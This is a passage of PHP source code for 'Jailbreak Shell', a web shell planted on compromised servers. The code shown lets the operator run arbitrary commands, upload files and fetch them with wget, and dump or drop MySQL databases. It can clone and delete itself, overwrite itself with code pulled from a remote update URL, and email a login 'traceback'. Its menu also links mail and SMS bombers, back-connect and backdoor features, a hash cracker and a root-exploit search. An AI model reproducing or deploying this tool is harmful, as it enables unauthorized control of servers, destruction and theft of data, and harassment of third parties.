  864. } elseif(isset($_SESSION['mysqlcon'])) {
  865. header("Location: $self?do=sqledit");
  866. } else {
  867. header("Location: $self?do=sqledit");
  868. }
  869. break;
  870. case 'sqledit':
  871. global $self;
  872. echo "<center>";
  873. extract($_SESSION);
  874. if(isset($_REQUEST['act']) && $_REQUEST['act'] == 'logout')
  875. {
  876. session_destroy();
  877. header("Location: $self?do=sql");
  878. }
  879. $sql_connection = @mysql_connect($sql_host.":".$sql_port,$sql_user,$sql_pass);
  880. if($sql_connection)
  881. {
  882. if(isset($_REQUEST['dropdb']))
  883. {
  884. if(@mysql_query("DROP DATABASE ".trim($_REQUEST['dropdb']),$sql_connection))
  885. {
  886. echo "Dropped database successfully!";
  887. } else {
  888. echo "Failed to drop database!";
  889. }
  890. }
  891. if(isset($_REQUEST['downloaddb']))
  892. {
  893. if(@!backup_tables($sql_host,$sql_user,$sql_pass,$_REQUEST['downloaddb'],$_REQUEST['downloaddb'].".sql"))
  894. {
  895. echo "Database dumped, download <a href='".$_REQUEST['downloaddb'].".sql'>here</a>!";
  896. } else {
  897. echo "Failed to dump database.";
  898. }
  899. }
  900. if(isset($_REQUEST['database']))
  901. {
  902. $show_tables = mysql_query("SHOW TABLES FROM ".$_REQUEST['database']);
  903. if(isset($_REQUEST['droptbl']))
  904. {
  905. $droptblq = @mysql_query("DROP TABLE $_REQUEST[database].$_REQUEST[droptbl]");
  906. if(!$droptblq)
  907. {
  908. echo "Failed to drop $_REQUEST[database].$_REQUEST[droptbl]!";
  909. } else {
  910. echo "$_REQUEST[database].$_REQUEST[droptbl] dropped successfully!";
  911. }
  912. }
  913. echo "<table width='60%'>";
  914. echo "<th width='50%'>Table Name</th>";
  915. echo "<th width='15%'>Column Count</th>";
  916. echo "<th width='35%'>Operations</th>";
  917. while($row = mysql_fetch_array($show_tables))
  918. {
  919. $ccount = mysql_query("SHOW COLUMNS FROM ".$_REQUEST['database'].".".$row[0]);
  920. $c = @mysql_num_rows($ccount);
  921. echo "<tr>";
  922. echo "<td width='50%'>$row[0]</td>";
  923. echo "<td width='15%'>$c</td>";
  924. echo "<td width='35%'>Dump | <a href='$self?do=sqledit&database=$_REQUEST[database]&droptbl=$row[0]'>Drop</a></td>";
  925. echo "</tr>";
  926. }
  927. mysql_free_result($show_tables);
  928. echo "</table>";
  929. }
  930. $sql_databases = mysql_list_dbs($sql_connection);
  931. echo "<table width='60%'>";
  932. echo "<tr>";
  933. echo "<th width='50%'>Database Name</th>";
  934. echo "<th width='15%'>Table Count</th>";
  935. echo "<th width='35%'>Operations</th>";
  936. echo "</tr>";
  937. echo "<tr>";
  938. while($row = mysql_fetch_object($sql_databases))
  939. {
  940. $sql_tables = mysql_query("SHOW TABLES FROM ".$row->Database);
  941. $sql_table_count = mysql_num_rows($sql_tables);
  942. echo "<tr><td width='50%'><a href='$self?do=sqledit&database=$row->Database'>".$row->Database."</a></td><td width='15%'>".$sql_table_count."</td><td width='35%'><a href='$self?do=sqledit&downloaddb=".$row->Database."'>Dump</a> | <a href='$self?do=sqledit&dropdb=".$row->Database."'>Drop</a></td></tr>";
  943. }
  944. echo "</tr>";
  945. echo "</table>";
  946. echo "<b>Logged in as ".$sql_user."@".$sql_host.":".$sql_port."</b> | <a href='$self?do=sqledit&act=logout'>Logout</a>";
  947. } else {
  948. $_SESSION = array();
  949. session_destroy();
  950. header("Location: $self?do=sql");
  951. }
  952. break;
  953. case 'sqldbs':
  954. if(isset($_REQUEST['downloaddb']))
  955. {
  956. }
  957. echo "<table width='50%'>";
  958. echo "<tr>";
  959. echo "<td width='100%'>SQL Databases</td>";
  960. echo "</tr>";
  961. echo "</table>";
  962. echo "<table width='50%'>";
  963. echo "<tr>";
  964. echo "<td width='55%'>Databases</td><td width='15%'>Table Count</td><td width='15%'>Download Database</td><td width='15%'>Drop Database</td>";
  965. echo "</tr>";
  966. echo "</table>";
  967. echo "<table width='50%'>";
  968. echo "<tr>";
  969. global $self;
  970. while($row = mysql_fetch_object($sql_databases)):
  971. $sql_tables = mysql_query("SHOW TABLES FROM ".$row->Database);
  972. $sql_table_count = mysql_num_rows($sql_tables);
  973. echo "<tr><td width='55%'><a href='$self?do=sqledit&database=$row->Database'>".$row->Database."</a></td><td width='15%'>".$sql_table_count."</td><td width='15%'>Download</td><td width='15%'><a href='$self?do=sqldbs&dropdb=".$row->Database."'>Drop</a></td></tr>";
  974. endwhile;
  975. echo "</tr>";
  976. echo "</table>";
  977. break;
  978. case 'tools':
  979. echo "<center>";
  980. echo "<table width='95%'>";
  981. echo "<th width='95%'>Tools</th>";
  982. echo "</table>";
  983. echo "<table width='95%'>";
  984. echo "<tr>";
  985. echo "<td width='50%'>vBulletin Config Parser</td>";
  986. echo "<td width='50%'>phpCrack MD5 Cracker</td>";
  987. echo "</tr>";
  988. echo "<tr>";
  989. echo "<td width='50%'><input type='text' name='configdir' value='/path/to/config.php' /><input type='submit' value='Parse' /></td>";
  990. echo "<td width='50%'><input type='text' name='hashedpw' value='md5 hash' /><input type='submit' value='Crack' /></td>";
  991. echo "</tr>";
  992. echo "<tr>";
  993. echo "<td width='50%'>Local Root Exploit Search</td>";
  994. echo "<td width='50%'></td>";
  995. echo "</tr>";
  996. echo "<tr>";
  997. echo "<td width='50%'><input type='text' name='kernel_version' value='' /><input type='submit' value='Set' /></td>";
  998. echo "<td width='50%'><input type='text' name='custom_version_url' value='' /><input type='submit' value='Set' /></td>";
  999. echo "</tr>";
  1000. echo "</table>";
  1001. break;
  1002. case 'cloneself':
  1003. global $self;
  1004. echo "<center>";
  1005. echo "<form action='$self' method='post'>";
  1006. echo "<input type='hidden' name='do' value='docloneself' />";
  1007. echo "Please choose a filename: ";
  1008. echo "<input type='text' size='30' name='clone_filename' value='".$self."' />";
  1009. echo "<br />";
  1010. echo "<input type='submit' name='submit' value='Clone' />";
  1011. echo "</form>";
  1012. break;
  1013. case 'docloneself':
  1014. global $self;
  1015. echo "<center>";
  1016. if(!empty($_REQUEST['clone_filename']))
  1017. {
  1018. $file_get_self = @file_get_contents($self);
  1019. if(!@file_put_contents($_REQUEST['clone_filename'],$file_get_self))
  1020. {
  1021. echo "Failed to clone shell!";
  1022. } else {
  1023. echo "Shell cloned successfully to <a href='".$_REQUEST['clone_filename']."'>".$_REQUEST['clone_filename']."</a>!";
  1024. }
  1025. } else {
  1026. echo "No filename defined!";
  1027. }
  1028. break;
  1029. case 'killshell':
  1030. global $self;
  1031. echo "<center>";
  1032. echo "<form action='$self' method='post'>";
  1033. echo "<input type='hidden' name='do' value='dokillshell' />";
  1034. echo "Do you really want to kill your shell?";
  1035. echo "<br />";
  1036. echo "<input type='submit' value='Kill' />";
  1037. echo "</form>";
  1038. break;
  1039. case 'dokillshell':
  1040. global $self;
  1041. echo "<center>";
  1042. if(empty($_SERVER['HTTP_REFERER']))
  1043. {
  1044. echo "Cannot be accessed directly!";
  1045. } else {
  1046. if(!unlink($self))
  1047. {
  1048. echo "Failed to kill shell!";
  1049. } else {
  1050. echo "Shell killed successfully!";
  1051. echo "<script type='text/javascript'>window.location = '$self';</script>";
  1052. }
  1053. }
  1054. break;
  1055. case 'update':
  1056. echo "<center>";
  1057. global $self;
  1058. global $update;
  1059. global $version;
  1060. global $check_version_url;
  1061. if($update == true)
  1062. {
  1063. $checkversion = @file_get_contents($check_version_url);
  1064. if($checkversion == $version)
  1065. {
  1066. $update_available = false;
  1067. } else {
  1068. $update_available = true;
  1069. }
  1070. if($update_available == true)
  1071. {
  1072. echo "There's an update available ($checkversion). Would you like to download it?";
  1073. echo "<br />";
  1074. echo "Updating may corrupt this shell, so as a backup, the shell will create a clone of itself.";
  1075. echo "<br />";
  1076. echo "If the shell updates successfully, it will give you the option to delete the clone.";
  1077. echo "<br />";
  1078. echo "Upon updating, the default username and password will be set to <b>jbshell</b>.";
  1079. echo "<form action='$self' method='post'>";
  1080. echo "<input type='hidden' name='do' value='doupdate' />";
  1081. echo "<input type='submit' name='doupdate' value='Update' />";
  1082. echo "</form>";
  1083. } else {
  1084. echo "There's no update available yet.";
  1085. }
  1086. } else {
  1087. echo "Updating is currently disabled.";
  1088. }
  1089. break;
  1090. case 'doupdate':
  1091. global $self;
  1092. global $update_available;
  1093. global $update_url;
  1094. echo "<center>";
  1095. if(!empty($_SERVER['HTTP_REFERER']))
  1096. {
  1097. if($update_available == true)
  1098. {
  1099. $clone_self = file_get_contents($self);
  1100. $get_new_code = file_get_contents($update_url);
  1101. $clone_pls = file_put_contents($self.".clone.php",$clone_self);
  1102. if($clone_pls)
  1103. {
  1104. if(file_put_contents($self,$get_new_code))
  1105. {
  1106. echo "Update complete!";
  1107. } else {
  1108. }
  1109. } else {
  1110. echo "Couldn't clone shell! Update will not work!";
  1111. }
  1112. } else {
  1113. echo "No update available.";
  1114. }
  1115. } else {
  1116. echo "Cannot link directly to the updater!";
  1117. }
  1118. break;
  1119. case 'deleteclones':
  1120. global $self;
  1121. echo "<center>";
  1122. if(unlink($self.".clone.php"))
  1123. {
  1124. echo "Cloned shell was deleted successfully.";
  1125. } else {
  1126. echo "Failed to delete cloned shell!";
  1127. }
  1128. break;
  1129. }
  1130. }
  1131. if(!isset($_REQUEST['skin']))
  1132. {
  1133. $_REQUEST['skin'] = 'empty';
  1134. }
  1135. if((isset($_REQUEST['do'])) && ($_REQUEST['do'] == 'sqldbs'))
  1136. {
  1137. if(!isset($_COOKIE['sql_host']))
  1138. {
  1139. setcookie('sql_host',$_REQUEST['sql_host'],time()+3600*24*365);
  1140. setcookie('sql_user',$_REQUEST['sql_user'],time()+3600*24*365);
  1141. setcookie('sql_pass',$_REQUEST['sql_pass'],time()+3600*24*365);
  1142. setcookie('sql_port',$_REQUEST['sql_port'],time()+3600*24*365);
  1143. }
  1144. }
  1145. if(!isset($_SESSION['skin']))
  1146. {
  1147. $_SESSION['skin'] = 'default';
  1148. }
  1149. if(isset($_POST['jbshell_login']))
  1150. {
  1151. if($jbshell_auth_user == $_REQUEST['jbshell_user'])
  1152. {
  1153. if($jbshell_auth_pass == $_REQUEST['jbshell_pass'])
  1154. {
  1155. setcookie('jbshell_user',$_REQUEST['jbshell_user'],time()+3600*24*365);
  1156. setcookie('jbshell_pass',$_REQUEST['jbshell_pass'],time()+3600*24*365);
  1157. setcookie('jbshell_loggedin','yes',time()+3600*24*365);
  1158. }
  1159. }
  1160. }
  1161. if(isset($_REQUEST['do']) && $_REQUEST['do'] == 'logout')
  1162. {
  1163. setcookie('jbshell_user','',time()-3600);
  1164. setcookie('jbshell_pass','',time()-3600);
  1165. setcookie('jbshell_loggedin','',time()-3600);
  1166. }
  1167. if((isset($_COOKIE['jbshell_loggedin'])) && ($_COOKIE['jbshell_loggedin'] != 'yes'))
  1168. {
  1169. setcookie('jbshell_loggedin','yes',time()-3600);
  1170. }
  1171. switch($_REQUEST['skin'])
  1172. {
  1173. case 'mulciber':
  1174. $_SESSION['skin'] = 'mulciber';
  1175. break;
  1176. case 'green':
  1177. $_SESSION['skin'] = 'green';
  1178. break;
  1179. case 'default':
  1180. $_SESSION['skin'] = 'default';
  1181. break;
  1182. }
  1183. // check version
  1184. $checkversion = @file_get_contents($check_version_url);
  1185. if($checkversion == $version)
  1186. {
  1187. $update_available = false;
  1188. } else {
  1189. $update_available = true;
  1190. }
  1191. if($update == true)
  1192. {
  1193. if($update_available == true)
  1194. {
  1195. $update_status = "Update is available <a href='$self?do=update'>[&bull; $checkversion &bull;]</a>";
  1196. } else {
  1197. $update_status = "Latest version";
  1198. }
  1199. } else {
  1200. $update_status = "Update is disabled";
  1201. }
  1202. ?>
  1203. <html>
  1204. <head>
  1205. <title>Jailbreak Shell <?php echo $version; ?></title>
  1206. <style type="text/css">
  1207. <?php if(isset($_SESSION['skin']))
  1208. {
  1209. if($_SESSION['skin'] == 'mulciber')
  1210. { ?>
  1211. body {
  1212. background-color: #000;
  1213. color: #fff;
  1214. font-family: tahoma;
  1215. font-size: 12px;
  1216. }
  1217. td {
  1218. border: 1px solid #000099;
  1219. background-color: #000033;
  1220. padding: 2px;
  1221. font-weight: bold;
  1222. text-align: center;
  1223. font-size: 11px;
  1224. }
  1225. td:hover {
  1226. color: yellow;
  1227. background: black;
  1228. }
  1229. input {
  1230. background-color: black;
  1231. color: white;
  1232. border: 1px solid #000066;
  1233. }
  1234. input:hover {
  1235. background-color: #000066;
  1236. border: 1px solid white;
  1237. }
  1238. input.first {
  1239. height: 100px;
  1240. }
  1241. textarea {
  1242. background-color: #000033;
  1243. color: white;
  1244. border: 1px solid white;
  1245. }
  1246. a {
  1247. text-decoration: none;
  1248. color: white;
  1249. font-weight: bold;
  1250. }
  1251. a:hover {
  1252. color: yellow
  1253. }
  1254. <?php } else if($_SESSION['skin'] == 'green')
  1255. { ?>
  1256. body {
  1257. background-color: #000;
  1258. color: #fff;
  1259. font-family: tahoma;
  1260. font-size: 12px;
  1261. }
  1262. td {
  1263. border: 1px solid #7FFF00;
  1264. background-color: #000000;
  1265. padding: 2px;
  1266. font-weight: bold;
  1267. text-align: center;
  1268. font-size: 11px;
  1269. }
  1270. td:hover {
  1271. color: yellow;
  1272. background: black;
  1273. }
  1274. input {
  1275. background-color: black;
  1276. color: white;
  1277. border: 1px solid #7FFF00;
  1278. }
  1279. input.first {
  1280. height: 100px;
  1281. }
  1282. textarea {
  1283. background-color: black;
  1284. color: white;
  1285. border: 1px solid #7FFF00;
  1286. }
  1287. a {
  1288. text-decoration: none;
  1289. color: white;
  1290. font-weight: bold;
  1291. }
  1292. a:hover {
  1293. color: yellow
  1294. }
  1295. <?php } else if($_SESSION['skin'] == 'default')
  1296. { ?>
  1297. body {
  1298. background-color: #000;
  1299. color: #fff;
  1300. font-family: tahoma;
  1301. font-size: 12px;
  1302. }
  1303. td {
  1304. border: 1px solid #007EFF;
  1305. background-color: #000000;
  1306. padding: 2px;
  1307. font-weight: bold;
  1308. text-align: center;
  1309. font-size: 11px;
  1310. border-radius: 5px;
  1311. -moz-border-radius: 5px;
  1312. -webkit-border-radius: 5px;
  1313. }
  1314. td:hover {
  1315. color: yellow;
  1316. background: black;
  1317. }
  1318. input {
  1319. background-color: black;
  1320. color: white;
  1321. border: 1px solid #007EFF;
  1322. border-radius: 10px;
  1323. -moz-border-radius: 10px;
  1324. -webkit-border-radius: 10px;
  1325. }
  1326. input.first {
  1327. height: 100px;
  1328. }
  1329. textarea {
  1330. background-color: black;
  1331. color: white;
  1332. border: 1px solid #007EFF;
  1333. border-radius: 10px;
  1334. -moz-border-radius: 10px;
  1335. -webkit-border-radius: 10px;
  1336. }
  1337. a {
  1338. text-decoration: none;
  1339. color: white;
  1340. font-weight: bold;
  1341. }
  1342. a:hover {
  1343. color: yellow
  1344. }
  1345. <?php }
  1346. } else { ?>
  1347. body {
  1348. background-color: #000;
  1349. color: #fff;
  1350. font-family: tahoma;
  1351. font-size: 12px;
  1352. }
  1353. td {
  1354. border: 1px solid #007EFF;
  1355. background-color: #000000;
  1356. padding: 2px;
  1357. font-weight: bold;
  1358. text-align: center;
  1359. font-size: 11px;
  1360. }
  1361. td:hover {
  1362. color: yellow;
  1363. background: black;
  1364. }
  1365. input {
  1366. background-color: black;
  1367. color: white;
  1368. border: 1px solid #007EFF;
  1369. }
  1370. input.first {
  1371. height: 100px;
  1372. }
  1373. textarea {
  1374. background-color: black;
  1375. color: white;
  1376. border: 1px solid #007EFF;
  1377. }
  1378. a {
  1379. text-decoration: none;
  1380. color: white;
  1381. font-weight: bold;
  1382. }
  1383. a:hover {
  1384. color: yellow
  1385. }
  1386. <?php } ?>
  1387. .warning_box_top {
  1388. top: 0px;
  1389. left: 0px;
  1390. background-color: #ff0000;
  1391. color: #ffffff;
  1392. font-weight: bold;
  1393. text-align: center;
  1394. }
  1395. </style>
  1396. </head>
  1397. <body>
  1398. <center>
  1399. <?php if(($lock == true) && ((!isset($_COOKIE['jbshell_user'])) OR ($_COOKIE['jbshell_user'] != $jbshell_auth_user)) && ((!isset($_COOKIE['jbshell_pass'])) OR ($_COOKIE['jbshell_pass'] != $jbshell_auth_pass))) { ?>
  1400. <h1><?php echo $welcometext; ?></h1>
  1401. <h2>Jailbreak Shell is currently locked. Please login to continue!</h2>
  1402. <form action='<?php echo $self; ?>' method='post'>
  1403. <input type='text' name='jbshell_user' size='30' />
  1404. <input type='password' name='jbshell_pass' size='30' />
  1405. <input type='submit' name='jbshell_login' value='Login' />
  1406. </form>
  1407. <h5>Jailbreak Shell &copy; @xijailbreakx 2012-2014</h5>
  1408. <h5>If you do not own this shell, please do not use it.</h5>
  1409. <?php if(((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_user != $_REQUEST['jbshell_user'])) OR ((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_pass != $_REQUEST['jbshell_pass'])) OR ((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_user != $_REQUEST['jbshell_user']) && ($jbshell_auth_pass != $_REQUEST['jbshell_pass']))) { ?>
  1410. <h3>Bad login!</h3>
  1411. <?php }
  1412. if((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_user == $_REQUEST['jbshell_user']) && ($jbshell_auth_pass == $_REQUEST['jbshell_pass'])) {
  1413. ?>
  1414. <h3>Login correct!</h3>
  1415. <?php
  1416. if($traceback == true)
  1417. {
  1418. mail($traceback_email,$traceback_subject,$traceback_body,$traceback_headers);
  1419. }
  1420. header("Location: $self");
  1421. } ?>
  1422. <?php } elseif(((isset($_COOKIE['jbshell_user'])) && ($jbshell_auth_user == $_COOKIE['jbshell_user']) && ($jbshell_auth_pass == $_COOKIE['jbshell_pass'])) OR ($lock == false) OR (($_COOKIE['jbshell_user'] == $jbshell_auth_user) && ($_COOKIE['jbshell_pass'] == $jbshell_auth_pass))) { ?>
  1423. <?php if($lock == false) { ?>
  1424. <div class='warning_box_top'>Lock disabled! Your shell can be accessed by anyone!</div>
  1425. <?php } ?>
  1426. <?php
  1427. if(!isset($_SESSION['traceback_sent']))
  1428. {
  1429. if($traceback == true)
  1430. {
  1431. if($lock == true)
  1432. {
  1433. mail($traceback_email,$traceback_subject,$traceback_body,$traceback_headers);
  1434. $_SESSION['traceback_sent'] = 'yes';
  1435. }
  1436. }
  1437. }
  1438. ?>
  1439. <table width="95%">
  1440. <tr>
  1441. <td width="10%">Host</td>
  1442. <td width="10%">Server IP</td>
  1443. <td width="10%">Server Disk</td>
  1444. <td width="10%">Server OS</td>
  1445. <td width="10%">Server Software</td>
  1446. <td width="10%">Your IP</td>
  1447. <td width="10%">Shell Name</td>
  1448. <td width="10%">Shell Location</td>
  1449. <td width="10%">Disabled PHP Functions</td>
  1450. <td width="10%">Current Directory Writeable?</td>
  1451. </tr>
  1452. <tr>
  1453. <td width="10%"><?php echo $_SERVER['HTTP_HOST']; ?></td>
  1454. <td width="10%"><?php echo @gethostbyname($_SERVER['HTTP_HOST']); ?></td>
  1455. <td width="10%"><?php echo $space.' used of '.$total; ?></td>
  1456. <td width="10%"><?php echo @php_uname(); ?></td>
  1457. <td width="10%"><?php echo $_SERVER['SERVER_SOFTWARE']; ?></td>
  1458. <td width="10%"><?php echo $_SERVER['REMOTE_ADDR'];?></td>
  1459. <td width="10%"><?php echo $self ?></td>
  1460. <td width="10%"><?php echo thisdir(getcwd()).'/'.basename($_SERVER['PHP_SELF']); ?></td>
  1461. <td width="10%"><?php getdisabled(); ?></td>
  1462. <td width="10%"><?php if(is_writeable(getcwd())){echo "Yes!";} else {echo "No!";} ?></td>
  1463. </tr>
  1464. </table>
  1465. <table width="95%">
  1466. <tr>
  1467. <td width="15%">Execute Command:</td>
  1468. <td width="85%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="cmd" /><input type="text" name="cmd" size="100" /> <input type="submit" name="executecmd" value="Execute" /></form></td>
  1469. </tr>
  1470. </table>
  1471. <br />
  1472. <b>
  1473. [ <a href="<?php echo $self; ?>">Main</a> ]
  1474. &nbsp;&nbsp;&nbsp;
  1475. [ <a href="<?php echo $self; ?>?do=info">Info</a> ]
  1476. &nbsp;&nbsp;&nbsp;
  1477. [ <a href="<?php echo $self; ?>?do=sql">SQL</a> ]
  1478. &nbsp;&nbsp;&nbsp;
  1479. [ <a href="<?php echo $self; ?>?do=files">Files</a> ]
  1480. &nbsp;&nbsp;&nbsp;
  1481. [ <a href="<?php echo $self; ?>?do=secinfo">Security Info</a> ]
  1482. &nbsp;&nbsp;&nbsp;
  1483. [ <a href="<?php echo $self; ?>?do=tools">Tools</a> ]
  1484. &nbsp;&nbsp;&nbsp;
  1485. [ <a href="<?php echo $self; ?>?do=reverseip">Reverse IP</a> ]
  1486. &nbsp;&nbsp;&nbsp;
  1487. [ <a href="<?php echo $self; ?>?do=mailer">Mail Bomber</a> ]
  1488. &nbsp;&nbsp;&nbsp;
  1489. [ <a href="<?php echo $self; ?>?do=sms">SMS Bomber</a> ]
  1490. &nbsp;&nbsp;&nbsp;
  1491. [ Back Connect ]
  1492. &nbsp;&nbsp;&nbsp;
  1493. [ Backdoor Host ]
  1494. &nbsp;&nbsp;&nbsp;
  1495. [ <a href="<?php echo $self; ?>?do=cloneself">Create Clone</a> ]
  1496. &nbsp;&nbsp;&nbsp;
  1497. [ <a href="<?php echo $self; ?>?do=killshell">Kill Shell</a> ]
  1498. &nbsp;&nbsp;&nbsp;
  1499. [ <a href="<?php echo $self; ?>?do=logout">Logout</a> ]
  1500. </b>
  1501. <br /><br />
  1502. <?php mainscreen(); ?>
  1503. <table width="95%">
  1504. <tr>
  1505. <td width="100%">Extras</td>
  1506. </tr>
  1507. </table>
  1508. <table width="95%">
  1509. <tr>
  1510. <td width="50%">Create File</td>
  1511. <td width="50%">Upload File</td>
  1512. </tr>
  1513. <tr>
  1514. <td width="50%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="createfile" /><input type="text" size="50" name="createfilename" /><input type="submit" name="submit" value="Create" /></form></td>
  1515. <td width="50%"><form action="<?php echo $self; ?>" method="post" enctype="multipart/form-data"><input type="hidden" name="do" value="uploadfile" /><label for="file">File:</label><input type="file" name="file" id="file" /> <input type="submit" name="submit" value="Submit" /></form></td>
  1516. </tr>
  1517. <tr>
  1518. <td width="50%">Create Directory</td>
  1519. <td width="50%">Wget File</td>
  1520. </tr>
  1521. <tr>
  1522. <td width="50%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="createdirectory" /><input type="text" size="50" name="createdirname" /><input type="submit" name="submit" value="Create" /></form></td>
  1523. <td width="50%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="wgetfile" /><input type="text" size="50" name="wgetlink" /><input type="submit" name="submit" value="Wget" /></form></td>
  1524. </tr>
  1525. </table>
  1526. <table width="95%">
  1527. <tr>
  1528. <td width="50%">Jailbreak Shell by @xijailbreakx | <?php echo $update_status; ?> | Switch skin: <a href="<?php echo $self; ?>?skin=default">Default</a> - <a href="<?php echo $self; ?>?skin=mulciber">Mulciber</a> - <a href="<?php echo $self; ?>?skin=green">Green</a> | Server Time: <?php echo date("H").":".date("i"); ?><?php if(file_exists($self.".clone.php")){ ?> | <a href="<?php echo $self; ?>?do=deleteclones">Delete backup shell</a><?php } ?></td>
  1529. </tr>
  1530. </table>
  1531. </center>
  1532. <?php } ?>
  1533. </body>
  1534. </html>

comments powered by Disqus